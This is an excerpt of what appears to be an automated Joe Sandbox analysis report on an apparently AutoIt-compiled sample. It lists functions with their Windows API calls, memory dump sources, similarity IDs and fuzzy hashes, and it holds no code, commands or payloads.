                                                APIs
                                                • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                • _wcslen.LIBCMT ref: 004610A3
                                                • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                • GetWindowRect.USER32(?,?), ref: 00461248
                                                  • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                • String ID: ThumbnailClass
                                                • API String ID: 4136854206-1241985126
                                                • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                • GetClientRect.USER32(?,?), ref: 00471A1A
                                                • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                • DestroyIcon.USER32(?), ref: 00471AF4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                • String ID: 2
                                                • API String ID: 1331449709-450215437
                                                • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                Function 0046081F Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                • __swprintf.LIBCMT ref: 00460915
                                                • __swprintf.LIBCMT ref: 0046092D
                                                • _wprintf.LIBCMT ref: 004609E1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                • API String ID: 3054410614-2561132961
                                                • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                • API String ID: 600699880-22481851
                                                • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                Function 00450C41 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: DestroyWindow
                                                • String ID: static
                                                • API String ID: 3375834691-2160076837
                                                • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                Function 0045D94B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 88COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ErrorMode$DriveType
                                                • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                • API String ID: 2907320926-3566645568
                                                • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                Function 00470928 Relevance: 16.7, APIs: 11, Instructions: 166windowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                • DeleteObject.GDI32(00310000), ref: 00470A04
                                                • DestroyIcon.USER32(0041005C), ref: 00470A1C
                                                • DeleteObject.GDI32(FB8E1CF9), ref: 00470A34
                                                • DestroyWindow.USER32(00720065), ref: 00470A4C
                                                • DestroyIcon.USER32(?), ref: 00470A73
                                                • DestroyIcon.USER32(?), ref: 00470A81
                                                • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                • String ID:
                                                • API String ID: 1237572874-0
                                                • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                • VariantInit.OLEAUT32(?), ref: 004793E1
                                                • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                • VariantClear.OLEAUT32(?), ref: 00479489
                                                • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                • VariantClear.OLEAUT32(?), ref: 004794CA
                                                • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                • String ID:
                                                • API String ID: 2706829360-0
                                                • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 0044480E
                                                • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                • GetKeyState.USER32(000000A0), ref: 004448AA
                                                • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                • GetKeyState.USER32(000000A1), ref: 004448D9
                                                • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                • GetKeyState.USER32(00000011), ref: 00444903
                                                • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                • GetKeyState.USER32(00000012), ref: 0044492D
                                                • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                • GetKeyState.USER32(0000005B), ref: 00444958
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: State$Async$Keyboard
                                                • String ID:
                                                • API String ID: 541375521-0
                                                • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                Function 00470B6C Relevance: 16.6, APIs: 11, Instructions: 125COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                • String ID:
                                                • API String ID: 3413494760-0
                                                • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: AddressProc_free_malloc$_strcat_strlen
                                                • String ID: AU3_FreeVar
                                                • API String ID: 2634073740-771828931
                                                • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CoInitialize.OLE32 ref: 0046C63A
                                                • CoUninitialize.OLE32 ref: 0046C645
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                  • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                  • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                • IIDFromString.OLE32(?,?), ref: 0046C705
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                • API String ID: 2294789929-1287834457
                                                • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                  • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                • ReleaseCapture.USER32 ref: 0047116F
                                                • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                • API String ID: 2483343779-2107944366
                                                • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
